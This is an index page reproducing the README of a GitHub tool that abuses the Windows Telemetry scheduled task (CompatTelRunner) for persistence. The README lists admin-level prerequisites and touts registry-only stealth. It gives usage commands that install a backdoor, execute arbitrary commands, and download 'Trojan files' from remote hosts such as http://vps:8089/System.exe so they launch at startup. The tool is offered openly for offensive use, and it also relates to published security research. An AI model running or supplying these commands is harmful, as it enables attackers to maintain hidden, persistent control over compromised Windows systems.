Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/360-Linton-Lab/Telemetry

WINDOWS TELEMETRY权限维持
https://github.com/360-Linton-Lab/Telemetry

Last synced: 21 days ago
JSON representation

WINDOWS TELEMETRY权限维持

Awesome Lists containing this project

README

        

# TELEMETRY

### Background

[TELEMETRY](#TELEMETRY-1) is a C# For Windows PERSISTENCE

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.

- **Local admin rights to install (requires the ability to write to HKLM)**
- **Have CompatTelRunner.exe**
- **2008R2/Windows 7 through 2019/Windows 10**

### Advantage

- **Using the system's own Telemetry planned tasks**
- **Only registry suspicious backdoor troubleshooting**

### Command Line Usage

ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
.Imanfeng
Features:
Install: - Deployment authority maintains backdoor

Command:
TELEMETRY.exe install /command:calc
- Execute command without file backdoor

TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
- Remotely download Trojan files to the specified directory for backdoor startup

TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
- Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup

TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
- Set path Trojan files for backdoor startup

Parameter:
/command: - Execute Command
/url: - Download FROM
/path: - Download To

- Execute command without file backdoor

```
Telemetry.exe install /command:calc
```

![1](PIC/2.png)

- Remotely download Trojan files for backdoor startup

```
Telemetry.exe install /url:http://vps:8089/System.exe
```

![2](PIC/1.png)

### Learn

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/